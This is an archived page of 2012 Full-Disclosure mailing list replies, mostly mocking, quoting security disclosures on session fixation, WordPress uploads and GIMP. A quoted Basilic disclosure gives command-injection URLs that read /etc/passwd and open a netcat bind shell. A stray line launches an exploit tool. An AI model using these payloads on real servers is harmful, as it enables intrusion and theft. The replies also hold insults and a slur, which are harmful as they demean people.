>> win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1)
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Anonymous/iWot] Somaleaks !!!

2012-07-19 Thread Benji 
LOL @ script kiddie == "terrorist"

By that logic, public urination is an act of arson.

Both acts are petty and at best deserve to face a firing squad at dawn.

On Thu, Jul 19, 2012 at 2:53 PM,   wrote:
> On Wed, 18 Jul 2012 09:16:29 -0400, Abdikarim Roble said:
>
>> As some of us already explained, we are not a terrorist organization.
>> It's just that we are fed-up with the fact that our society is loosing
>> time. So we just decided to speed-up actions against terrorists and
>> their friends. We will first try to eradicate the sources of terrorist
>> financing. It is not possible to know at this time the precise scope
>> or the duration of our actions to counter terrorist threats linked to
>> Internet.
>
> Cool story, bro.  Too bad you're going after terrorists rather than the *real*
> threat to our society - those who are destroying our civil liberties and way 
> of
> life in the name of "protecting us from terrorists".
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Benji 
SO you're talking about making a baseline?

On Mon, Jul 16, 2012 at 7:52 PM, Ali Varshovi  wrote:
> Hello everybody and thank you for your useful comments.
>
> Now I'm thinking that we need a comparison base or normal behavior profile to 
> be able to detect any deviations or abnormal/suspicious activity. While some 
> known patterns of behaviors are useful to detect malware or backdoors we 
> still need that normal profile to detect 0-day or APT style intrusions. Isn't 
> that the same idea from early days of intrusion detection research (anomaly 
> detection approach)? Or maybe I'm off track.
>
> Thoughts?
>
> --Original Message--
> To: full-disclosure@lists.grok.org.uk
> Subject: Linux - Indicators of compromise
> Sent: Jul 14, 2012 8:46 AM
>
> Greetings FD,
>
> Does anyone have any guidelines/useful material on analysis logs of a Linux 
> machine to detect signs of compromise? The data collection piece is not a 
> challenge as a lot of useful information can be captured using commands and 
> some scripts. I'm wondering if there is any systematic approach to analyze 
> the collected logs? Most of the materials I've seen are more aligned to 
> malware and rootkit detection which is not the only concern apparently.
>
> Thanks,
>
> Ali
> .
> -
> Sent from my BlackBerry device
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Benji 
" All compromised systems talk to the Internet to dump data or route spam."

yup, this is 1000% true and utterly foolproof.


On Mon, Jul 16, 2012 at 2:48 PM, Gary Baribault  wrote:
> I suggest one of the first answers was the good one, intercept the traffic
> routed to the internet with TCPDump. Filter out the normal traffic and see
> what's left. All compromised systems talk to the Internet to dump data or
> route spam. Be patient, some systems talk all the time, some once an hour ..
> but you will find some unexplained traffic. Once you do find that you're
> infected, don't bother cleaning up the system, format and restore the data!
>
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
> On 07/16/2012 09:40 AM, valdis.kletni...@vt.edu wrote:
>
> On Sat, 14 Jul 2012 12:46:50 -, "Ali Varshovi " said:
>
> Most of the materials I've seen are more aligned to malware and rootkit
> detection which is not the only concern apparently.
>
> It's hard to say what else to check without knowing what other concerns
> you're checking for, and what data sources are available (I'm thinking about
> auditd and friends, but there's other data sources as well).
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-13 Thread Benji 
Yes but you live in cave x

On Fri, Jul 13, 2012 at 3:56 PM, Григорий Братислава
 wrote:
> On Fri, Jul 13, 2012 at 10:44 AM, Benji  wrote:
>
>> Come to Europe, we show you how to party@#!
>
> Is that is what Greeks and Spaniards call this behaviour? Is funny, to
> me is similar to riot.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-13 Thread Benji 
World is hard, big bully many places. Scary to think that I do nothing
to add to this informative, useful, and sometimes genuinely insightful
list where on a daily basis people restore my faith in humanity and
make me believe that common sense is not dead and that the word
'hacker' is not thrown around.

Come to Europe, we show you how to party@#!

On Fri, Jul 13, 2012 at 3:10 PM, Григорий Братислава
 wrote:
> On Thu, Jul 12, 2012 at 9:15 AM,   wrote:
>> Benji,
>>
>> Do you write anything but scathing criticism?  I've never seen you
>> contribute anything of use to this list.   You must be a real pleasure in
>> person.
>>
>
> s#ritney#enji#g
> http://www.youtube.com/watch?v=kHmvkRoEowc
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-13 Thread Benji 
x

On Thu, Jul 12, 2012 at 2:15 PM,   wrote:
> Benji,
>
> Do you write anything but scathing criticism?  I've never seen you
> contribute anything of use to this list.   You must be a real pleasure in
> person.
>
>
> Sent using Hushmail
>
>
>
> On 07/12/2012 at 4:52 AM, Benji  wrote:
>
> Ah, please send more emails explaining the faults of retarded
> programmers and serious vulnerabilities, and then link to an owasp
> page.
>
> Can you explain HTTPOnly cookies to me? I will only accept your
> explanation if you can justify an impact of Critical, a likelihood of
> High and a severity of High?
>
> fuq'in kidz...
>
> On Wed, Jul 11, 2012 at 11:20 PM, Gökhan Muharremoğlu
>  wrote:
>>
>> This article explains how this vulnerability works with Session Fixation
>> attack.
>>
>> https://www.owasp.org/index.php/Testing_for_Session_Fixation_(OWASP-SM-003)
>>
>>> From: gokhan.muharremo...@iosec.org
>>> To: full-disclosure@lists.grok.org.uk
>>> Date: Wed, 11 Jul 2012 11:34:11 +0300
>>> Subject: [Full-disclosure] Predefined Post Authentication Session ID
>
>>> Vulnerability
>>
>>>
>>> Vulnerability Name: Predefined Post Authentication Session ID
>>> Vulnerability
>>> Type: Improper Session Handling
>>> Impact: Session Hijacking
>>> Level: Medium
>>> Date: 10.07.2012
>>> Vendor: Vendor-neutral
>>> Issuer: Gokhan Muharremoglu
>>> E-mail: gokhan.muharremo...@iosec.org
>>>
>>>
>>> VULNERABILITY
>>> If a web application starts a session and defines a session id before a
>>> user
>>> authenticated, this session id must be changed after a successful< br>>
>
>>> authentication. If web application uses the same session id before and
>>> after
>>
>>> authentication, any legitimate user who has gained the "before
>>> authentication" session id can hijack future "after authentication"
>>> sessions
>>> too.
>>>
>>>
>>> Vulnerable Login Page & Session ID before Authentication
>>> (Status-Line) HTTP/1.1 200 OK
>>> Server Apache/2.2.3 (CentOS)
>>> Set-Cookie PHPSESSID=8usd2oeo11a8cod9q3lnev9je2; path=/
>>> Expires Thu, 19 Nov 1981 08:52:00 GMT
>>> Cache-Control no-store, no-cache, must-revalidate, post-check=0,
>>> pre-check=0
>>> Pragma no-cache
>>> Content-Type text/html
>>> Content-Length 308
>>> Date Tue, 10 Jul 2012 06:16:57 GMT
>>> X-Varnish 1922993981
>>> Age 0
>>> Via 1.1 varnish
>>> Connection keep-alive
>>>
>>>
>>> Vulnerable Login Page & Authentication Request
>>> (Request-Line) POST /io sec_login_vulnerable.php HTTP/1.1
>
>>
>>> Host www.iosec.org
>>> User-Agent Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2.25)
>>> Gecko/20111212 Firefox/3.6.25 ( .NET CLR 3.5.30729; .NET4.0E)
>>> Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>> Accept-Language tr-tr,tr;q=0.8,en-us;q=0.5,en;q=0.3
>>> Accept-Encoding gzip,deflate
>>> Accept-Charset ISO-8859-9,utf-8;q=0.7,*;q=0.7
>>> Keep-Alive 115
>>> Connection keep-alive
>>> Referer http://www.iosec.org/iosec_login_vulnerable.php
>>> Cookie PHPSESSID=8usd2oeo11a8cod9q3lnev9je2
>>> Content-Type application/x-www-form-urlencoded
>>> Content-Length 42
>>> POST DATA
>>> user gokhan
>>> pass muharremoglu
>>> submit Login
>>>
>>>
>>> Vulnerable Login Page & Session ID after Authentication
>>> (Status-Line) HTTP/1.1 200 OK
>>> Server Apache/2.2.3 (CentOS)
>>> Set-Cookie PHPSESSID=8usd2oeo11a8cod9q3lnev9je2; path=/
>>> Expires Thu, 19 Nov 1981 08:52:00 GMT
>>> Cache-Control no-store, no-cache, must-revalidate, post-check=0,
>>> pre-check=0
>>> Pragma no-cache
>>> Content-Type text/html
>>> Content-Length 308
>>> Date Tue, 10 Jul 2012 06:16:57 GMT
>>> X-Varnish 1922993981
>>> Age 0
>>> Via 1.1 varnish
>>> Connection keep-alive
>>>
>>>
>>> MITIGATION
>>> To avoid this vulnerability, sessions must be regenerated after a
>>> successful
>>> login. In a session fixation attack, attacker fixates (sets) another
>>> person's (victim's) session identifier because of "never regenerated and
>>> validated" session i

Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-13 Thread Benji 
Yes, god Jann, you're such a moron.

On Fri, Jul 13, 2012 at 9:46 AM, Gokhan Muharremoglu
 wrote:
> You can find an example page and combined vulnerabilities below URL.
> This example login page is affected by Predefined Post Authentication
> Session ID Vulnerability.
> This vulnerability can lead a social engineering scenario or other hijacking
> attack scenarios when mixed with other vulnerabilities (such XSS).
>
> For proof of concept:
>
> http://www.iosec.org/iosec_login_vulnerable.php
>
>
> Predefined Post Authentication Session ID Vulnerability is a Vendor-neutral
> vulnerability and it let attackers to design new attack scenarios.
> A lot of web application on the Internet affected by this vulnerability.
>
> ---
> Vulnerability Name: Predefined Post Authentication Session ID Vulnerability
> Type: Improper Session Handling
> Impact: Session Hijacking
> Level: Medium
> Date: 10.07.2012
> Vendor: Vendor-neutral
> Issuer: Gokhan Muharremoglu
> E-mail: gokhan.muharremo...@iosec.org
>
>
> VULNERABILITY
> If a web application starts a session and defines a session id before a user
> authenticated, this session id must be changed after a successful
> authentication. If web application uses the same session id before and after
> authentication, any legitimate user who has gained the "before
> authentication" session id can hijack future "after authentication" sessions
> too.
>
> MITIGATION
> To avoid this vulnerability, sessions must be regenerated after a successful
> login. In a session fixation attack, attacker fixates (sets) another
> person's (victim's) session identifier because of "never regenerated and
> validated" session id and this vulnerability can also lead to the Session
> Fixation attack or etc.
>
> Gokhan Muharremoglu
> Information Security Specialist
> (CEH, ECSA, CIW-Web Security Professional, Security+, EXIN 27002 ISFS)
>
> -Original Message-
> From: Jann Horn [mailto:jannh...@googlemail.com]
> Sent: Friday, July 13, 2012 2:06 AM
> To: Gokhan Muharremoglu
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Predefined Post Authentication Session ID
> Vulnerability
>
> On Wed, Jul 11, 2012 at 11:34:11AM +0300, Gokhan Muharremoglu wrote:
>> Vulnerability Name: Predefined Post Authentication Session ID
>> Vulnerability
>> Type: Improper Session Handling
>> Impact: Session Hijacking
>> Level: Medium
>> Date: 10.07.2012
>> Vendor: Vendor-neutral
>> Issuer: Gokhan Muharremoglu
>> E-mail: gokhan.muharremo...@iosec.org
>>
>>
>> VULNERABILITY
>> If a web application starts a session and defines a session id before
>> a user authenticated, this session id must be changed after a
>> successful authentication. If web application uses the same session id
>> before and after authentication, any legitimate user who has gained
>> the "before authentication" session id can hijack future "after
>> authentication" sessions too.
>
> Uh, so, erm, you assume that someone can steal my cookie/set it/whatever
> although the Same Origin Policy should clearly not allow that, and then,
> after I have logged in, he can't just steal my cookie? Unless you allow
> setting the session-ID via an URL or so (which would IMO be pretty stupid),
> I can't see how this is a realistic, vendor-neutral attack. Could you
> explain this a bit better? I don't get it.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-12 Thread Benji 
Ah, please send more emails explaining the faults of retarded
programmers and serious vulnerabilities, and then link to an owasp
page.

Can you explain HTTPOnly cookies to me? I will only accept your
explanation if you can justify an impact of Critical, a likelihood of
High and a severity of High?

fuq'in kidz...

On Wed, Jul 11, 2012 at 11:20 PM, Gökhan Muharremoğlu
 wrote:
>
> This article explains how this vulnerability works with Session Fixation
> attack.
> https://www.owasp.org/index.php/Testing_for_Session_Fixation_(OWASP-SM-003)
>
>> From: gokhan.muharremo...@iosec.org
>> To: full-disclosure@lists.grok.org.uk
>> Date: Wed, 11 Jul 2012 11:34:11 +0300
>> Subject: [Full-disclosure] Predefined Post Authentication Session ID
>> Vulnerability
>
>>
>> Vulnerability Name: Predefined Post Authentication Session ID
>> Vulnerability
>> Type: Improper Session Handling
>> Impact: Session Hijacking
>> Level: Medium
>> Date: 10.07.2012
>> Vendor: Vendor-neutral
>> Issuer: Gokhan Muharremoglu
>> E-mail: gokhan.muharremo...@iosec.org
>>
>>
>> VULNERABILITY
>> If a web application starts a session and defines a session id before a
>> user
>> authenticated, this session id must be changed after a successful< br>>
>> authentication. If web application uses the same session id before and after
>
>> authentication, any legitimate user who has gained the "before
>> authentication" session id can hijack future "after authentication"
>> sessions
>> too.
>>
>>
>> Vulnerable Login Page & Session ID before Authentication
>> (Status-Line) HTTP/1.1 200 OK
>> Server Apache/2.2.3 (CentOS)
>> Set-Cookie PHPSESSID=8usd2oeo11a8cod9q3lnev9je2; path=/
>> Expires Thu, 19 Nov 1981 08:52:00 GMT
>> Cache-Control no-store, no-cache, must-revalidate, post-check=0,
>> pre-check=0
>> Pragma no-cache
>> Content-Type text/html
>> Content-Length 308
>> Date Tue, 10 Jul 2012 06:16:57 GMT
>> X-Varnish 1922993981
>> Age 0
>> Via 1.1 varnish
>> Connection keep-alive
>>
>>
>> Vulnerable Login Page & Authentication Request
>> (Request-Line) POST /io sec_login_vulnerable.php HTTP/1.1
>
>> Host www.iosec.org
>> User-Agent Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2.25)
>> Gecko/20111212 Firefox/3.6.25 ( .NET CLR 3.5.30729; .NET4.0E)
>> Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> Accept-Language tr-tr,tr;q=0.8,en-us;q=0.5,en;q=0.3
>> Accept-Encoding gzip,deflate
>> Accept-Charset ISO-8859-9,utf-8;q=0.7,*;q=0.7
>> Keep-Alive 115
>> Connection keep-alive
>> Referer http://www.iosec.org/iosec_login_vulnerable.php
>> Cookie PHPSESSID=8usd2oeo11a8cod9q3lnev9je2
>> Content-Type application/x-www-form-urlencoded
>> Content-Length 42
>> POST DATA
>> user gokhan
>> pass muharremoglu
>> submit Login
>>
>>
>> Vulnerable Login Page & Session ID after Authentication
>> (Status-Line) HTTP/1.1 200 OK
>> Server Apache/2.2.3 (CentOS)
>> Set-Cookie PHPSESSID=8usd2oeo11a8cod9q3lnev9je2; path=/
>> Expires Thu, 19 Nov 1981 08:52:00 GMT
>> Cache-Control no-store, no-cache, must-revalidate, post-check=0,
>> pre-check=0
>> Pragma no-cache
>> Content-Type text/html
>> Content-Length 308
>> Date Tue, 10 Jul 2012 06:16:57 GMT
>> X-Varnish 1922993981
>> Age 0
>> Via 1.1 varnish
>> Connection keep-alive
>>
>>
>> MITIGATION
>> To avoid this vulnerability, sessions must be regenerated after a
>> successful
>> login. In a session fixation attack, attacker fixates (sets) another
>> person's (victim's) session identifier because of "never regenerated and
>> validated" session id and this vulnerability can also lead to the Session
>> Fixation attack.
>>
>> ___
>> Full-Discl osure - We believe in it.
>
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IOSEC HTTP Anti Flood/DoS Security Gateway Module (PHP Script)

2012-07-11 Thread Benji 
Just read this crap due to your amazing emails. Crap code, easily bypassable.

On Wed, Jul 11, 2012 at 9:37 AM, Gokhan Muharremoglu
 wrote:
> http://sourceforge.net/projects/iosec/
>
> This module provides security enhancements against (HTTP) Flood & Brute
> Force Attacks for native PHP or .NET scripts at web application level.
> Massive crawling/scanning tools, HTTP flood tools can be detected and
> blocked by this module via htaccess or iptables, etc.
>
> You can use this module by including "iosec.php" to any PHP file which wants
> to be protected.
>
> You can test module here: http://www.iosec.org/test.php (demo)
>
> Wordpress Plugin
> http://wordpress.org/extend/plugins/iosec-anti-flood-security-gateway-module
>
> CHANGES v.1.7
> - Request Cache Size Option
> - Improved Implicit Deny Mode
> - Excluded Files Support
> - Admin GUI Removed
> - Config File Removed
> - Connection Limit Support
> - Whitelist Support
> - Reverse Proxy Support
> - reCAPTCHA Support
>
> This is a unique project and it is the world's first web application flood
> guard script.
> At web application (scripting) level you can,
> - Block proxies. (only via HTTP header)
> - Detect flooding IP addresses.
> - Slow down or restrict access for automated tools (HTTP flood, brute force
> tools, vulnerability scanners, etc.)
> - Save your server resources (database, cpu, ram, etc.) under an attack.
> - Restrict access permanently or temporarily for listed IP addresses in
> "banlist" file.
> - Notify yourself via email alerts when attacks begin.
> - Implicit deny for DDoS attacks
>
> You can use IOSEC under .NET see. http://phalanger.codeplex.com/
>
> Gokhan Muharremoglu
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-11 Thread Benji 
I have no words, just shock.

On Wed, Jul 11, 2012 at 9:34 AM, Gokhan Muharremoglu
 wrote:
> Vulnerability Name: Predefined Post Authentication Session ID Vulnerability
> Type: Improper Session Handling
> Impact: Session Hijacking
> Level: Medium
> Date: 10.07.2012
> Vendor: Vendor-neutral
> Issuer: Gokhan Muharremoglu
> E-mail: gokhan.muharremo...@iosec.org
>
>
> VULNERABILITY
> If a web application starts a session and defines a session id before a user
> authenticated, this session id must be changed after a successful
> authentication. If web application uses the same session id before and after
> authentication, any legitimate user who has gained the "before
> authentication" session id can hijack future "after authentication" sessions
> too.
>
>
> Vulnerable Login Page & Session ID before Authentication
> (Status-Line)   HTTP/1.1 200 OK
> Server  Apache/2.2.3 (CentOS)
> Set-Cookie  PHPSESSID=8usd2oeo11a8cod9q3lnev9je2; path=/
> Expires Thu, 19 Nov 1981 08:52:00 GMT
> Cache-Control   no-store, no-cache, must-revalidate, post-check=0,
> pre-check=0
> Pragma  no-cache
> Content-Typetext/html
> Content-Length  308
> DateTue, 10 Jul 2012 06:16:57 GMT
> X-Varnish   1922993981
> Age 0
> Via 1.1 varnish
> Connection  keep-alive
>
>
> Vulnerable Login Page & Authentication Request
> (Request-Line)  POST /iosec_login_vulnerable.php HTTP/1.1
> Hostwww.iosec.org
> User-Agent  Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2.25)
> Gecko/20111212 Firefox/3.6.25 ( .NET CLR 3.5.30729; .NET4.0E)
> Accept  text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language tr-tr,tr;q=0.8,en-us;q=0.5,en;q=0.3
> Accept-Encoding gzip,deflate
> Accept-Charset  ISO-8859-9,utf-8;q=0.7,*;q=0.7
> Keep-Alive  115
> Connection  keep-alive
> Referer  http://www.iosec.org/iosec_login_vulnerable.php
> Cookie  PHPSESSID=8usd2oeo11a8cod9q3lnev9je2
> Content-Typeapplication/x-www-form-urlencoded
> Content-Length  42
> POST DATA
> usergokhan
> passmuharremoglu
> submit  Login
>
>
> Vulnerable Login Page & Session ID after Authentication
>  (Status-Line)  HTTP/1.1 200 OK
> Server  Apache/2.2.3 (CentOS)
> Set-Cookie  PHPSESSID=8usd2oeo11a8cod9q3lnev9je2; path=/
> Expires Thu, 19 Nov 1981 08:52:00 GMT
> Cache-Control   no-store, no-cache, must-revalidate, post-check=0,
> pre-check=0
> Pragma  no-cache
> Content-Typetext/html
> Content-Length  308
> DateTue, 10 Jul 2012 06:16:57 GMT
> X-Varnish   1922993981
> Age 0
> Via 1.1 varnish
> Connection  keep-alive
>
>
> MITIGATION
> To avoid this vulnerability, sessions must be regenerated after a successful
> login. In a session fixation attack, attacker fixates (sets) another
> person's (victim's) session identifier because of "never regenerated and
> validated" session id and this vulnerability can also lead to the Session
> Fixation attack.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Basilic RCE bug

2012-07-06 Thread Benji 
Thank you for confirming that, and providing an even sup3r c00ler POC.
I have always wondered how nc works, and combined with system, it
seems it makes a super exciting vulnerability.

On Fri, Jul 6, 2012 at 5:32 PM, larry Cashdollar  wrote:
> verified, http://artis.imag.fr/Software/Basilic/
>
> http://127.0.0.1/basilic/Config/diff.php?file=%26nc%20-ltp%20-e%20/bin/bash&new=1&old=2
>
> for an interactive shell on port .  Neat.
>
> line 39 of diff.php is
>
> system("diff ../$_GET[old]/$_GET[file] $_GET[new]/$_GET[file] | sed
> s%\"<\"%\"\<\"%g | sed s%\">\"%\"\>\"%g");
>
>
> On Jun 30, 2012, at 01:45 PM, m.razavi...@gmail.com wrote:
>
> Hi
> Dear Sir
>
> Basilic is an Automated Bibliography Server for Research Publications
> Diffusion that use by many research center.
> there is a RCE bug in basilic/Config/diff.php s could allow an attacker to
> run system command in server.
> sample:
> http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2
>
> Regards
> M.Razavi
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [oss-security] RE: GIMP FIT File Format DoS

2012-07-02 Thread Benji 
hey! let them having something to add to CV! Stop be fun police!
Everyone know security isnt actually about security, just make CV look
super cool.

On Fri, Jun 29, 2012 at 10:45 PM, Morris, Patrick  wrote:
>
>> -Original Message-
>> From: Joseph Sheridan [mailto:j...@reactionis.com]
>> Sent: Friday, June 29, 2012 3:56 AM
>> To: 'full-disclosure'; 'bugtraq'; secal...@securityreason.com;
>> b...@securitytracker.com; 'vuln'; v...@security.nnov.ru;
>> n...@securiteam.com; moderat...@osvdb.org;
>> submissi...@packetstormsecurity.org; sub...@cxsecurity.com; oss-
>> secur...@lists.openwall.com; b...@securitytracker.com
>> Subject: GIMP FIT File Format DoS
>>
>> Summary
>> ===
>>
>> There is a file handling DoS in GIMP (the GNU Image Manipulation
>> Program) for
>> the 'fit' file format affecting all versions (Windows and Linux) up to
>> and
>> including 2.8.0. A file in the fit format with a malformed 'XTENSION'
>> header
>> will cause a crash in the GIMP program.
>
> Is a crash in a single-user program really a security vulnerability? I could
> understand if there was evidence that this could lead to privilege escalation
> or other actual security issue, but this sounds like a garden-variety crash
> bug to me.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WordPress Authenticated File Upload Authorisation Bypass

2012-06-21 Thread Benji 
I hear Trustwave are reporting similar issues, like the fact you can
specify remote mysql servers in new installations, amazing right? Do
you work for them?

Btw, with phpmyadmin you can injection sql commands !!!

On Fri, Jun 22, 2012 at 12:00 AM, Denis Andzakovic
 wrote:
>
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Say a wordpress install has been configured as such that the user running
> the web server does not have write access to wp-content/plugins. A wordpress
> admin then attempts to upload a plugin, they get prompted for ftp
> credentials to be able to install. Wordpress does this to ensure everything
> has the right permissions.
> (http://codex.wordpress.org/Managing_Plugins#Installing_Plugins)
>
> *Before* getting prompted for these creds, the uploaded file is staged into
> the uploads directory, which lives under the web-root. The issue here is
> that files, regardless of installation status and type, are thrown into the
> uploads directory.
>
> I see one potential scenario as; a sysadmin would lock down the file
> permissions on the wp-content/plugins directory to stop Wordpress
> users/admins from uploading potentially malicious code. Admittedly, config
> define( 'DISALLOW_FILE_MODS', TRUE), is the correct way of doing this,
> however that doesn't make the former scenario completely implausible.
>
> Regards,
> Denis
>
> On 22/06/12 2:42 AM, Greg Knaddison wrote:
>
>> On Wed, Jun 20, 2012 at 8:04 PM, Denis Andzakovic
>> > > wrote:
>>
>> Exploitation of this vulnerability requires a malicious user with
>> access to the admin panel to use the
>> "/wp-admin/plugin-install.php?tab=upload" page to upload a malicious
>> file.
>>
>>
>> That tool is meant to allow an admin to upload arbitrary php plugins. You
>> can argue that this feature is insecure by design, but there are two
>> solutions from the WordPress perspective:
>>
>> 1) "Don't grant malicious users the permission to install plugins."
>> 2) If you don't want this feature on your site at all, this feature can be
>> disabled in the config define( 'DISALLOW_FILE_MODS', TRUE);
>>
>> By the way, two more "vulnerabilities" the theme installer has this same
>> issue and the upgrade tool could also be abused if you can poison the DNS of
>> the server.
>>
>> Regards,
>> Greg
>
> -BEGIN PGP SIGNATURE-
> Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>
> iQEcBAEBAgAGBQJP46eqAAoJED9OsznShNuRuekH/2zmzIOEkvCK+K8CtS/WgJER
> jU/A0nVLUlFpvI5hPo5tx7Ago7TCxXmQbohsy6bHuUBehk2qT8VAPIox4mqs6RQk
> 9qtuBUBoCCJhiEO+HITpTvrqd4cskTgEY87KzCE6BkbhDq46PCNwSckceBIruEY7
> PPkNCkabNXgyRQj6uvJqlg8eoe4FfXDujFBcTxVcWZEciJAxYDVGUe7V3mkekmZ2
> E7ixd5tCNs9sZ60LUQ5huj4and5JaBFHiQTj8pwJ73yuFoFwoNwtFSBZ7r8qGzjl
> J99IxBfgP/pDcioEi43j9CBfIJTElgwhH3guu4FneiGa5lEKwdirPBgEI9LKYA8=
> =bQkR
> -END PGP SIGNATURE-
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-10 Thread Benji 
You're the one that suggested a real suggestion would be to use an
'alternate os'.

Live in a cave please?

On Sun, Jun 10, 2012 at 10:56 PM, Laurelai  wrote:

>  On 6/10/12 5:54 PM, Benji wrote:
>
> Which antisec kids? Unfortunately due to some poeple being utterly delued,
> such as yourself, throwing that word around it's rather ambiguous now.
>
> On Sun, Jun 10, 2012 at 10:49 PM, Laurelai  wrote:
>
>>   On 6/10/12 5:09 PM, Thor (Hammer of God) wrote:
>>
>>  OK, I’ll bite this one time.  I assert you are blatantly lying about
>> military service.  How about tell me your service dates?  Surely you can’t
>> consider that any sort of privacy breach.
>>
>>
>>
>> This is an easy way for us to be done with the whole thing.  Part of your
>> diatribe is based on your “right” to bitch because of your military
>> service.  I, again, assert that is complete fabrication.  As someone who
>> actually HAS done work for the government I know (as you should) that your
>> military service records are actually public record.  I don’t need your
>> service dates, but it will help.  All I need do is fax over form SF-180,
>> and they’ll verify your service.
>>
>>
>>
>> If you really did serve, I’ll apologize publically.  If you didn’t (or
>> don’t provide the information) then we’ll all know you are just a lying
>> nutjob and we can ignore you from now on.  Is that fair enough?
>>
>>
>>
>> *[image: Description: Description: Description: Description:
>> Description: Description: Description: Description: Description: TimSig]*
>> **
>>
>> * *
>>
>> *Timothy “Thor”  Mullen*
>>
>> *www.hammerofgod.com*
>>
>> *Thor’s Microsoft Security 
>> Bible<http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727>
>> *
>>
>>
>>
>>
>>
>> *From:* full-disclosure-boun...@lists.grok.org.uk [
>> mailto:full-disclosure-boun...@lists.grok.org.uk]
